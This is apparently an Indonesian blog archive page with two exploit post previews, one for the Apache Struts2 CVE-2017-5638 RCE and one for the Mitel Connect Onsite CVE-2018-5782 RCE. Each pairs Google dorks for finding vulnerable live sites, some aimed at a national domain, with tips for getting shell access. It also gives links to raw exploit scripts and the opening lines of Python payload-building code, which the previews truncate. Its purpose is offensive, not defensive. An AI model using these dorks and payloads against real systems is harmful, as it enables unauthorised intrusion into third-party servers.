Langsung ke konten utama

Postingan

Menampilkan postingan dari Juli, 2019

CVE 2017-5638: Struts2 Unauthenticated RCE

CVE: 2017-5638 Title: Struts Unauthenticated RCE Dork: inurl: viewAdministrators.action             [ Dork hasil pengembangan ]            intext: Bamboo administrators inurl: viewAdministrators.action            filetype: action site:in Kerentanan ini menyebabkan penyerang dapat mengakses perintah shell tanpa otenkasi (Unauthenticated). Melewati headers. public_html Kerentanan ini biasanya terletak di direktori '/opt'. Agak sulit menemukan public_html Kerentanan ini. Tips: Jika target menggunakan bamboo. root site terletak di (../atlassian-bamboo) * Kerentanan ini terletak di file action. Exploit scripts. Author: - Bahasa: python3 Raw: https://www.exploit-db.com/raw/41570 ''' #!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd):     payload = "%{(#_='multipart/form-data')."     payload += "(#dm=@ognl.Og...
Posting Komentar
Baca selengkapnya

CVE 2018-5782: Mitel connect onsite 19.49.5200.0 RCE

CVE: 2018-5782 Title: Mitel connect onsite 19.49.5200.0 RCE Dork:  +"Public" +"My Conferences" +"Personal Library" +"My Profile" Kerentanan ini menyebabkan penyerang dapat mengakses perintah shell tanpa otenkasi (Unauthenticated). Beberapa dari situs ini tidak dapat writable menggunakan wget dan curl. Jadi gunakan 'echo' sebagai gantinya Exploit scripts: Author: menkrep1337. Bahasa: python3. Dependensi: requests. [ pip install requests ] Pastebin: https://pastebin.com/raw/nqUgi7gs ''' import base64, requests, sys def build_shoretel(cmd):         obj = {                 "hostId": "system",                 "keyCode": "base64_decode",                 "meetingType": "{${gKeyCode}($gSessionDir)}",                 "sessionDir": base64.b64encode(bytes(cmd, "utf-8")).decode("ascii"), ...
Posting Komentar
Baca selengkapnya